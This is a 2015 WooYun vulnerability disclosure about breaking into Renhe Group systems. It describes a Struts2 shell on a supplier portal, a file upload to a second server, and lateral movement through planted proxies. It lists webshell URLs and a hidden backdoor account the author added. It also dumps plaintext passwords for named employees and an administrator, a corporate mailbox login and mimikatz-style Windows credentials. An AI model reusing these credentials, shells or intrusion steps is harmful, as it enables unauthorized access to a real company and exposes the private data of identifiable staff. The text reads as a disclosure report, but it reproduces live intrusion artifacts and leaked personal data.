当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0161220

漏洞标题:仁和集团某系统漏洞(内网漫游/数据库/多个系统/3389登陆/近30子公司)

相关厂商:仁和集团

漏洞作者: DNS

提交时间:2015-12-14 15:29

修复时间:2016-01-25 18:01

公开时间:2016-01-25 18:01

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-14: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-01-25: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

20
涉及旗下近30个公司

详细说明:

首先是一个ST2说起
http://218.87.194.57:8080/suppler/login/login_login.action
供应商管理平台,直接shell

11111.png


菜刀地址:http://218.87.194.57:8080/suppler/user/config.jsp
内网代理地址:http://218.87.194.57:8080/suppler/js/conn.jsp
大马地址:http://218.87.194.57:8080/suppler/js/config.jsp
由于system权限

1.png


内部保存非常之多的密码信息,包括数据库
链接上去看看

2.png


3.png


4.png


5.png


以及服务器共享的其他服务器的文件
读取到home。renhe。com的系统数据库
现在涉及第二个系统
http://home.renhe.com/login/login_index.h

4.png


ps:求美女QQ
拿到刚才的用户密码
大量用户密码;1,还有4位纯数字
登陆上去

6.png


登陆上去
在发表说说的地方,附件任意上传

上传shell.png


获取shell:http://home.renhe.com/uploads/2015/12/14/201512348124337.253.jsp
同样的system权限
菜刀:http://home.renhe.com/uploads/2015/12/14/config.jsp
内网代理:http://home.renhe.com/js/conn.jsp
看看文件

1.png


2.png


3.png


4.png


5.png


所有的数据库,源代码,备份都在
后台:http://home.renhe.com/manage.jsp

"id"	"username"	"loginName"	"loginPsw"	"lower_level"	"parentId"	"roleId"	"createDate"	"lastLoginDate"	"loginCount"	"lastLoginIP"	"status"	"status_marathon"	"status_half"	"status_9km"	"status_mini"	"count_marathon"	"count_half"	"count_9km"	"count_mini"	"count_marathon_stage"	"count_half_stage"	"count_9km_stage"	"count_mini_stage"	"group_id"
"1" "系统超级管理员" "admin" "RHZJ2014" "no" "" "1" "2010-8-19 14:52:04" "2015-12-11 14:32:15" "3822" "192.168.2.105" "0" "true" "true" "true" "true" "1000" "1100" "1000" "1000" "0" "0" "0" "0" "5"
"47" "产品添加" "chanpin" "111111" "no" "" "" "2014-9-2 09:09:01" "2014-10-20 17:51:28" "135" "127.0.0.1" "0" "" "" "" "" "" "" "" "" "" "" "" "" "9"
"50" "视频发布人员1" "video1" "video1" "no" "" "15" "2014-9-20 15:30:35" "2014-9-20 16:05:58" "1" "127.0.0.1" "0" "" "" "" "" "" "" "" "" "" "" "" "" "3"
"51" "视频发布人员2" "video2" "video2" "no" "" "15" "2014-9-20 15:31:00" "2014-9-20 15:31:00" "0" "0.0.0.0" "0" "" "" "" "" "" "" "" "" "" "" "" "" "3"
"52" "管理员" "xieguan" "xieguan" "no" "" "" "2014-11-17 17:05:10" "2015-1-31 11:01:24" "18" "119.251.46.167" "0" "" "" "" "" "" "" "" "" "" "" "" "" "3"
"57" "陈荷荷" "chenhh" "123456" "no" "" "" "2014-11-24 12:08:19" "2015-12-7 14:27:08" "125" "172.16.22.36" "0" "" "" "" "" "" "" "" "" "" "" "" "" "3"
"58" "罗俊" "huangbo" "123456" "no" "" "" "2014-11-24 13:30:40" "2015-3-3 14:52:48" "46" "218.87.194.45" "1" "" "" "" "" "" "" "" "" "" "" "" "" "18"
"60" "任艳军" "renyj" "123456" "no" "" "" "2014-11-24 15:56:17" "2014-11-24 16:02:41" "2" "124.192.28.18" "0" "" "" "" "" "" "" "" "" "" "" "" "" "3"
"61" "黄波" "huangbo" "454910498" "no" "" "" "2014-11-26 14:22:53" "2014-11-26 15:01:56" "7" "218.87.194.45" "0" "" "" "" "" "" "" "" "" "" "" "" "" "3"
"62" "辛丽娇" "xinlj" "xin5201314" "no" "" "" "2014-11-28 13:38:49" "2015-5-19 09:37:06" "12" "192.168.218.1" "0" "" "" "" "" "" "" "" "" "" "" "" "" "3"
"63" "胡旭玲" "huxl" "hxl331200" "no" "" "" "2015-3-23 17:28:16" "2015-11-26 10:15:28" "23" "192.168.195.4" "0" "" "" "" "" "" "" "" "" "" "" "" "" "3"


登陆后台可以找到一个邮箱:

后台.png


明文.png


service@renhe.com
Renhe2014@qwe


这样可以获取到全部的公司架构,通讯录
大概30多个公司员工通讯录

公司架构.png


公司架构2.png


邮件.png


邮箱2.png


该系统不得已添加了一个用户debug$,密码debug.123! 抱歉
已经拿到甚多信息,查看并没有域
贴下读取到的用户密码:

Authentication Id:0;996
Authentication Package:Negotiate
Primary User:NETWORK SERVICE
Authentication Domain:NT AUTHORITY
* User: WWW-6C265A4688B$
* Domain: WORKGROUP
* Password:
Authentication Id:0;1100461
Authentication Package:NTLM
Primary User:rhzjzc
Authentication Domain:WWW-6C265A4688B
* User: rhzjzc
* Domain: WWW-6C265A4688B
* Password: zj.888.cn2012
Authentication Id:0;997
Authentication Package:Negotiate
Primary User:LOCAL SERVICE
Authentication Domain:NT AUTHORITY
(LUID ERROR)
Authentication Id:0;44089
Authentication Package:NTLM
Primary User:
Authentication Domain:
(LUID ERROR)
Authentication Id:0;999
Authentication Package:NTLM
Primary User:WWW-6C265A4688B$
Authentication Domain:WORKGROUP
(LUID ERROR)


就这样吧,home.renhe.com 可以直接跳转到OA
代理慢死了 累啊

漏洞证明:

3333333333.png


修复方案:

版权声明:转载请注明来源 DNS@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)